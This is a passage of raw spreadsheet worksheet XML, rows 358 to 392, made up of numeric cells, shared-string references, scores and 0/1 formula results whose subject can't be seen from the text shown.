      <c r="H358" s="64">
        <v>0.0</v>
      </c>
      <c r="I358" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J358" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K358" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L358" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O358" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="62">
        <v>2776.0</v>
      </c>
      <c r="B359" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C359" s="63" t="s">
        <v>1258</v>
      </c>
      <c r="D359" s="62" t="s">
        <v>1259</v>
      </c>
      <c r="E359" s="62" t="s">
        <v>1260</v>
      </c>
      <c r="F359" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G359" s="62">
        <v>0.9</v>
      </c>
      <c r="H359" s="64">
        <v>0.0</v>
      </c>
      <c r="I359" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J359" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K359" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L359" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O359" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="62">
        <v>2943.0</v>
      </c>
      <c r="B360" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C360" s="63" t="s">
        <v>1261</v>
      </c>
      <c r="D360" s="62" t="s">
        <v>1262</v>
      </c>
      <c r="E360" s="62" t="s">
        <v>1263</v>
      </c>
      <c r="F360" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G360" s="62">
        <v>0.9</v>
      </c>
      <c r="H360" s="64">
        <v>1.0</v>
      </c>
      <c r="I360" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J360" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K360" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L360" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O360" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="62">
        <v>2977.0</v>
      </c>
      <c r="B361" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C361" s="63" t="s">
        <v>1264</v>
      </c>
      <c r="D361" s="62" t="s">
        <v>1265</v>
      </c>
      <c r="E361" s="62" t="s">
        <v>1266</v>
      </c>
      <c r="F361" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G361" s="62">
        <v>0.85</v>
      </c>
      <c r="H361" s="64">
        <v>0.0</v>
      </c>
      <c r="I361" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J361" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K361" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L361" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O361" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="62">
        <v>3010.0</v>
      </c>
      <c r="B362" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C362" s="63" t="s">
        <v>1267</v>
      </c>
      <c r="D362" s="62" t="s">
        <v>1268</v>
      </c>
      <c r="E362" s="62" t="s">
        <v>1269</v>
      </c>
      <c r="F362" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G362" s="62">
        <v>0.8</v>
      </c>
      <c r="H362" s="64">
        <v>0.0</v>
      </c>
      <c r="I362" s="64" t="s">
        <v>1270</v>
      </c>
      <c r="J362" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K362" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L362" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O362" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="62">
        <v>3274.0</v>
      </c>
      <c r="B363" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C363" s="63" t="s">
        <v>1271</v>
      </c>
      <c r="D363" s="62" t="s">
        <v>1272</v>
      </c>
      <c r="E363" s="62" t="s">
        <v>1273</v>
      </c>
      <c r="F363" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G363" s="62">
        <v>0.9</v>
      </c>
      <c r="H363" s="64">
        <v>1.0</v>
      </c>
      <c r="I363" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J363" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K363" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L363" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O363" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="62">
        <v>3402.0</v>
      </c>
      <c r="B364" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C364" s="63" t="s">
        <v>1274</v>
      </c>
      <c r="D364" s="62" t="s">
        <v>1275</v>
      </c>
      <c r="E364" s="62" t="s">
        <v>1276</v>
      </c>
      <c r="F364" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G364" s="62">
        <v>0.9</v>
      </c>
      <c r="H364" s="64" t="s">
        <v>1277</v>
      </c>
      <c r="I364" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J364" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K364" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L364" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O364" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="62">
        <v>3416.0</v>
      </c>
      <c r="B365" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C365" s="63" t="s">
        <v>1278</v>
      </c>
      <c r="D365" s="62" t="s">
        <v>1279</v>
      </c>
      <c r="E365" s="62" t="s">
        <v>1280</v>
      </c>
      <c r="F365" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G365" s="62">
        <v>0.8</v>
      </c>
      <c r="H365" s="64">
        <v>0.0</v>
      </c>
      <c r="I365" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J365" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K365" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L365" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O365" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="62">
        <v>3420.0</v>
      </c>
      <c r="B366" s="62" t="s">
        <v>41</v>
      </c>
      <c r="C366" s="63" t="s">
        <v>1281</v>
      </c>
      <c r="D366" s="62" t="s">
        <v>1282</v>
      </c>
      <c r="E366" s="62" t="s">
        <v>1283</v>
      </c>
      <c r="F366" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G366" s="62">
        <v>0.85</v>
      </c>
      <c r="H366" s="64">
        <v>1.0</v>
      </c>
      <c r="I366" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J366" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K366" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L366" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O366" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="62">
        <v>5251.0</v>
      </c>
      <c r="B367" s="62" t="s">
        <v>44</v>
      </c>
      <c r="C367" s="63" t="s">
        <v>1284</v>
      </c>
      <c r="D367" s="62" t="s">
        <v>1285</v>
      </c>
      <c r="E367" s="62" t="s">
        <v>1286</v>
      </c>
      <c r="F367" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G367" s="62">
        <v>0.95</v>
      </c>
      <c r="H367" s="64">
        <v>1.0</v>
      </c>
      <c r="I367" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J367" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K367" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L367" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O367" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="62">
        <v>5273.0</v>
      </c>
      <c r="B368" s="62" t="s">
        <v>44</v>
      </c>
      <c r="C368" s="63" t="s">
        <v>1287</v>
      </c>
      <c r="D368" s="62" t="s">
        <v>1288</v>
      </c>
      <c r="E368" s="62" t="s">
        <v>1289</v>
      </c>
      <c r="F368" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G368" s="62">
        <v>0.9</v>
      </c>
      <c r="H368" s="64">
        <v>1.0</v>
      </c>
      <c r="I368" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J368" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K368" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L368" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O368" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="62">
        <v>182.0</v>
      </c>
      <c r="B369" s="62" t="s">
        <v>46</v>
      </c>
      <c r="C369" s="63" t="s">
        <v>1290</v>
      </c>
      <c r="D369" s="62" t="s">
        <v>1291</v>
      </c>
      <c r="E369" s="62" t="s">
        <v>1292</v>
      </c>
      <c r="F369" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G369" s="62">
        <v>0.85</v>
      </c>
      <c r="H369" s="64">
        <v>1.0</v>
      </c>
      <c r="I369" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J369" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K369" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L369" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O369" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="62">
        <v>429.0</v>
      </c>
      <c r="B370" s="62" t="s">
        <v>46</v>
      </c>
      <c r="C370" s="63" t="s">
        <v>1293</v>
      </c>
      <c r="D370" s="62" t="s">
        <v>1294</v>
      </c>
      <c r="E370" s="62" t="s">
        <v>1295</v>
      </c>
      <c r="F370" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G370" s="62">
        <v>0.95</v>
      </c>
      <c r="H370" s="64">
        <v>1.0</v>
      </c>
      <c r="I370" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J370" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K370" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L370" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O370" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="62">
        <v>462.0</v>
      </c>
      <c r="B371" s="62" t="s">
        <v>46</v>
      </c>
      <c r="C371" s="63" t="s">
        <v>1296</v>
      </c>
      <c r="D371" s="62" t="s">
        <v>1297</v>
      </c>
      <c r="E371" s="62" t="s">
        <v>1298</v>
      </c>
      <c r="F371" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G371" s="62">
        <v>0.85</v>
      </c>
      <c r="H371" s="64">
        <v>1.0</v>
      </c>
      <c r="I371" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J371" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K371" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L371" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O371" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="62">
        <v>37.0</v>
      </c>
      <c r="B372" s="62" t="s">
        <v>48</v>
      </c>
      <c r="C372" s="63" t="s">
        <v>1299</v>
      </c>
      <c r="D372" s="62" t="s">
        <v>1300</v>
      </c>
      <c r="E372" s="62" t="s">
        <v>1301</v>
      </c>
      <c r="F372" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G372" s="62">
        <v>0.9</v>
      </c>
      <c r="H372" s="64">
        <v>1.0</v>
      </c>
      <c r="I372" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J372" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K372" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L372" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O372" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="62">
        <v>65.0</v>
      </c>
      <c r="B373" s="62" t="s">
        <v>48</v>
      </c>
      <c r="C373" s="63" t="s">
        <v>1302</v>
      </c>
      <c r="D373" s="62" t="s">
        <v>1303</v>
      </c>
      <c r="E373" s="62" t="s">
        <v>1304</v>
      </c>
      <c r="F373" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G373" s="62">
        <v>0.9</v>
      </c>
      <c r="H373" s="64">
        <v>1.0</v>
      </c>
      <c r="I373" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J373" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K373" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L373" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O373" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="62">
        <v>77.0</v>
      </c>
      <c r="B374" s="62" t="s">
        <v>48</v>
      </c>
      <c r="C374" s="63" t="s">
        <v>1305</v>
      </c>
      <c r="D374" s="62" t="s">
        <v>1306</v>
      </c>
      <c r="E374" s="62" t="s">
        <v>1307</v>
      </c>
      <c r="F374" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G374" s="62">
        <v>0.8</v>
      </c>
      <c r="H374" s="64">
        <v>1.0</v>
      </c>
      <c r="I374" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J374" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K374" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L374" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O374" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="62">
        <v>118.0</v>
      </c>
      <c r="B375" s="62" t="s">
        <v>48</v>
      </c>
      <c r="C375" s="63" t="s">
        <v>1308</v>
      </c>
      <c r="D375" s="62" t="s">
        <v>1309</v>
      </c>
      <c r="E375" s="62" t="s">
        <v>1310</v>
      </c>
      <c r="F375" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G375" s="62">
        <v>0.9</v>
      </c>
      <c r="H375" s="64">
        <v>1.0</v>
      </c>
      <c r="I375" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J375" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K375" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L375" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O375" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="62">
        <v>341.0</v>
      </c>
      <c r="B376" s="62" t="s">
        <v>48</v>
      </c>
      <c r="C376" s="63" t="s">
        <v>1311</v>
      </c>
      <c r="D376" s="62" t="s">
        <v>1312</v>
      </c>
      <c r="E376" s="62" t="s">
        <v>1313</v>
      </c>
      <c r="F376" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G376" s="62">
        <v>0.9</v>
      </c>
      <c r="H376" s="64">
        <v>1.0</v>
      </c>
      <c r="I376" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J376" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K376" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L376" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O376" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="62">
        <v>475.0</v>
      </c>
      <c r="B377" s="62" t="s">
        <v>48</v>
      </c>
      <c r="C377" s="63" t="s">
        <v>1314</v>
      </c>
      <c r="D377" s="62" t="s">
        <v>1315</v>
      </c>
      <c r="E377" s="62" t="s">
        <v>1316</v>
      </c>
      <c r="F377" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G377" s="62">
        <v>0.95</v>
      </c>
      <c r="H377" s="64">
        <v>1.0</v>
      </c>
      <c r="I377" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J377" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K377" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L377" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O377" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="62">
        <v>3033.0</v>
      </c>
      <c r="B378" s="62" t="s">
        <v>50</v>
      </c>
      <c r="C378" s="63" t="s">
        <v>1317</v>
      </c>
      <c r="D378" s="62" t="s">
        <v>1318</v>
      </c>
      <c r="E378" s="62" t="s">
        <v>1319</v>
      </c>
      <c r="F378" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G378" s="62">
        <v>0.9</v>
      </c>
      <c r="H378" s="64">
        <v>1.0</v>
      </c>
      <c r="I378" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J378" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K378" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L378" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O378" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="62">
        <v>3589.0</v>
      </c>
      <c r="B379" s="62" t="s">
        <v>50</v>
      </c>
      <c r="C379" s="63" t="s">
        <v>1320</v>
      </c>
      <c r="D379" s="62" t="s">
        <v>1321</v>
      </c>
      <c r="E379" s="62" t="s">
        <v>1322</v>
      </c>
      <c r="F379" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G379" s="62">
        <v>0.95</v>
      </c>
      <c r="H379" s="64">
        <v>0.0</v>
      </c>
      <c r="I379" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J379" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K379" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L379" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O379" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="62">
        <v>3649.0</v>
      </c>
      <c r="B380" s="62" t="s">
        <v>50</v>
      </c>
      <c r="C380" s="63" t="s">
        <v>1323</v>
      </c>
      <c r="D380" s="62" t="s">
        <v>1324</v>
      </c>
      <c r="E380" s="62" t="s">
        <v>1325</v>
      </c>
      <c r="F380" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G380" s="62">
        <v>0.9</v>
      </c>
      <c r="H380" s="64">
        <v>1.0</v>
      </c>
      <c r="I380" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J380" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K380" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L380" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O380" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="62">
        <v>461.0</v>
      </c>
      <c r="B381" s="62" t="s">
        <v>52</v>
      </c>
      <c r="C381" s="63" t="s">
        <v>1326</v>
      </c>
      <c r="D381" s="62" t="s">
        <v>1327</v>
      </c>
      <c r="E381" s="62" t="s">
        <v>1328</v>
      </c>
      <c r="F381" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G381" s="62">
        <v>0.9</v>
      </c>
      <c r="H381" s="64">
        <v>1.0</v>
      </c>
      <c r="I381" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J381" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K381" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L381" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O381" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="62">
        <v>1777.0</v>
      </c>
      <c r="B382" s="62" t="s">
        <v>52</v>
      </c>
      <c r="C382" s="63" t="s">
        <v>1329</v>
      </c>
      <c r="D382" s="62" t="s">
        <v>1330</v>
      </c>
      <c r="E382" s="62" t="s">
        <v>1331</v>
      </c>
      <c r="F382" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G382" s="62">
        <v>0.9</v>
      </c>
      <c r="H382" s="64">
        <v>1.0</v>
      </c>
      <c r="I382" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J382" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K382" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L382" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O382" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="62">
        <v>18.0</v>
      </c>
      <c r="B383" s="62" t="s">
        <v>55</v>
      </c>
      <c r="C383" s="63" t="s">
        <v>1332</v>
      </c>
      <c r="D383" s="62" t="s">
        <v>1333</v>
      </c>
      <c r="E383" s="62" t="s">
        <v>1334</v>
      </c>
      <c r="F383" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G383" s="62">
        <v>0.9</v>
      </c>
      <c r="H383" s="64">
        <v>1.0</v>
      </c>
      <c r="I383" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J383" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K383" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L383" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O383" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="62">
        <v>27194.0</v>
      </c>
      <c r="B384" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C384" s="63" t="s">
        <v>1335</v>
      </c>
      <c r="D384" s="62" t="s">
        <v>1336</v>
      </c>
      <c r="E384" s="62" t="s">
        <v>1337</v>
      </c>
      <c r="F384" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G384" s="62">
        <v>0.9</v>
      </c>
      <c r="H384" s="64" t="s">
        <v>1338</v>
      </c>
      <c r="I384" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J384" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K384" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L384" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O384" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="62">
        <v>27288.0</v>
      </c>
      <c r="B385" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C385" s="63" t="s">
        <v>1339</v>
      </c>
      <c r="D385" s="62" t="s">
        <v>1340</v>
      </c>
      <c r="E385" s="62" t="s">
        <v>1341</v>
      </c>
      <c r="F385" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G385" s="62">
        <v>0.95</v>
      </c>
      <c r="H385" s="64">
        <v>1.0</v>
      </c>
      <c r="I385" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J385" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K385" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L385" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O385" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="62">
        <v>27305.0</v>
      </c>
      <c r="B386" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C386" s="63" t="s">
        <v>1342</v>
      </c>
      <c r="D386" s="62" t="s">
        <v>1343</v>
      </c>
      <c r="E386" s="62" t="s">
        <v>1344</v>
      </c>
      <c r="F386" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G386" s="62">
        <v>0.95</v>
      </c>
      <c r="H386" s="64">
        <v>1.0</v>
      </c>
      <c r="I386" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J386" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K386" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L386" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O386" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="62">
        <v>28003.0</v>
      </c>
      <c r="B387" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C387" s="63" t="s">
        <v>1345</v>
      </c>
      <c r="D387" s="62" t="s">
        <v>1346</v>
      </c>
      <c r="E387" s="62" t="s">
        <v>1347</v>
      </c>
      <c r="F387" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G387" s="62">
        <v>0.9</v>
      </c>
      <c r="H387" s="64">
        <v>1.0</v>
      </c>
      <c r="I387" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J387" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K387" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L387" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O387" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="62">
        <v>28233.0</v>
      </c>
      <c r="B388" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C388" s="63" t="s">
        <v>1348</v>
      </c>
      <c r="D388" s="62" t="s">
        <v>1349</v>
      </c>
      <c r="E388" s="62" t="s">
        <v>1350</v>
      </c>
      <c r="F388" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G388" s="62">
        <v>0.9</v>
      </c>
      <c r="H388" s="64">
        <v>1.0</v>
      </c>
      <c r="I388" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J388" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K388" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L388" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O388" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="62">
        <v>28258.0</v>
      </c>
      <c r="B389" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C389" s="63" t="s">
        <v>1351</v>
      </c>
      <c r="D389" s="62" t="s">
        <v>1352</v>
      </c>
      <c r="E389" s="62" t="s">
        <v>1353</v>
      </c>
      <c r="F389" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G389" s="62">
        <v>0.85</v>
      </c>
      <c r="H389" s="64">
        <v>0.0</v>
      </c>
      <c r="I389" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J389" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K389" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L389" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O389" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="62">
        <v>28381.0</v>
      </c>
      <c r="B390" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C390" s="63" t="s">
        <v>1354</v>
      </c>
      <c r="D390" s="62" t="s">
        <v>1355</v>
      </c>
      <c r="E390" s="62" t="s">
        <v>1356</v>
      </c>
      <c r="F390" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G390" s="62">
        <v>0.95</v>
      </c>
      <c r="H390" s="64">
        <v>1.0</v>
      </c>
      <c r="I390" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J390" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K390" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L390" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O390" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="62">
        <v>28455.0</v>
      </c>
      <c r="B391" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C391" s="63" t="s">
        <v>1357</v>
      </c>
      <c r="D391" s="62" t="s">
        <v>1358</v>
      </c>
      <c r="E391" s="62" t="s">
        <v>1359</v>
      </c>
      <c r="F391" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G391" s="62">
        <v>0.9</v>
      </c>
      <c r="H391" s="64">
        <v>0.0</v>
      </c>
      <c r="I391" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J391" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K391" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L391" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O391" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="62">
        <v>28539.0</v>
      </c>
      <c r="B392" s="62" t="s">
        <v>57</v>
      </c>
      <c r="C392" s="63" t="s">
        <v>1360</v>
